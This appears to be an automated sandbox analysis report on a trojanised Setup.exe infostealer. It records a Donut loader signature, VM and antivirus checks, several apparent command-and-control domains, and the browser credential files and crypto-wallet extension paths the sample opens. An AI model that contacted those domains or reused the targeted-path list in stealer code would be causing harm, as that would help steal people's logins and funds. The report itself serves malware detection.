            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: Setup.exeStatic PE information: invalid certificate
            Source: Setup.exe, 00000000.00000003.2271039022.0000000005A6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamequickupgrade.exe< vs Setup.exe
            Source: Setup.exe, 00000000.00000002.2467729403.00000000008DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamequickupgrade.exe< vs Setup.exe
            Source: Setup.exeBinary or memory string: OriginalFilenamequickupgrade.exe< vs Setup.exe
            Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Setup.exe, 00000000.00000003.2320108086.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319703156.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2341908581.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Setup.exeReversingLabs: Detection: 13%
            Source: Setup.exeString found in binary or memory: @SshClient::CliCommonParam::GetKeypairFile::KeypairImporterInterface::GetPassphraseCould not import the keypair specified with -: passphrase in - is invalid.: a passphrase needs to be provided using -Importing keypair specified with - parameter value; try -help for more information.globalparameteropensshputtyprefersupport parameter value; expecting 'p' to prefer, 's' to support, or 'n' to not use. parameter value: expecting IPv4 and/or IPv6 interface.lowhigh parameter value; expecting numeric value or 'Default'. parameter value is too ; using the est valid value instead.bestany parameter value: expecting 'Best' or '3'. parameter value; expecting 'r' to require or 's' to support.Invalid host parameter; malformed host part.Invalid host parameter; empty host part.Invalid host parameter; malformed port part. parameter was received from the internet. Only safe parts of the profile will be loaded. If you trust this profile, open it in the graphical SSH Client to unblock it, or open the file's Properties in Windows File Explorer and select Unblock.It appears the profile specified using the - parameter are not supported: algorithms specified with -Loading profile specified with - parameter failed: Profile file: Importing host keys specified with -Unreferenced socks4socksv4socks5socksv5httphttpconnectssh parameter value: nested SSH jump proxy connections are not supported. parameter value; expecting 'SOCKS4', 'SOCKS5', or 'HTTP'.'HTTP', or 'SSH'.=SSH parameter cannot be used without the -Missing -: cannot be used with proxy server disabled: can only be used with a proxy server enabled: cannot be used with a SOCKSv4 proxy server: cannot be used with an SSH jump proxy server: can only be used with an SSH jump proxy server parameter has failed: Reason: If this client is being run under a different Windows account than the one that generated the keypair, export the keypair into a file and use the - prevents global client keys from loading.The use of Unable to add client key. OR ]]] ]] licensed to This license is good for business and government use.
            Source: Setup.exeString found in binary or memory: (display usage information)-help-usage(displays help page by page)-help | more(creates a text file you can open e.g. with Notepad)-help > h.txt(display help for parameters in general)-help-params(display help for a particular parameter)-help-<param>(display examples)-help-examples(display return codes)-help-codes-help-params | more, try:
            Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Setup.exeStatic file information: File size 8710648 > 1048576
            Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x553400
            Source: Setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1eba00
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\repos\main\SSH2\Release\pdbs\sftpc.pdb source: Setup.exe
            Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Setup.exeStatic PE information: real checksum: 0x6b97f8 should be: 0x8516ec
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF5F push es; ret 0_3_0314EF6E
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF5F push es; ret 0_3_0314EF6E
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF6F push es; ret 0_3_0314EF86
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF6F push es; ret 0_3_0314EF86
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314761B push eax; iretd 0_3_0314766D
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314761B push eax; iretd 0_3_0314766D
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03145248 push eax; iretd 0_3_03145249
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03145248 push eax; iretd 0_3_03145249
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF5F push es; ret 0_3_0314EF6E
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF5F push es; ret 0_3_0314EF6E
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF6F push es; ret 0_3_0314EF86
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314EF6F push es; ret 0_3_0314EF86
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DE1 push cs; ret 0_3_05C30DE2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30DF8 push cs; ret 0_3_05C30DFA
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C2D582 push cs; ret 0_3_05C2D583
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C2D582 push cs; ret 0_3_05C2D583
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C2D582 push cs; ret 0_3_05C2D583
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C2D582 push cs; ret 0_3_05C2D583
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_05C30D81 push cs; ret 0_3_05C30D82
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\Setup.exe TID: 3520Thread sleep time: -210000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Setup.exe, 00000000.00000002.2468096237.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468096237.0000000003089000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466366236.00000000030E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: Setup.exe, 00000000.00000002.2468096237.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466366236.00000000030E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWoH1
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: Setup.exe, 00000000.00000003.2341230548.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Setup.exe, 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
            Source: Setup.exe, 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
            Source: Setup.exe, 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
            Source: Setup.exe, 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
            Source: Setup.exe, 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
            Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Setup.exe, 00000000.00000003.2466740251.000000000314A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468367008.000000000314A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444349084.0000000003149000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444320809.0000000003145000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2407521746.000000000315A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6924, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Setup.exeString found in binary or memory: Wallets/Electrum
            Source: Setup.exeString found in binary or memory: s/ElectronCash
            Source: Setup.exeString found in binary or memory: window-state.json
            Source: Setup.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: Setup.exeString found in binary or memory: ExodusWeb3
            Source: Setup.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: Setup.exeString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
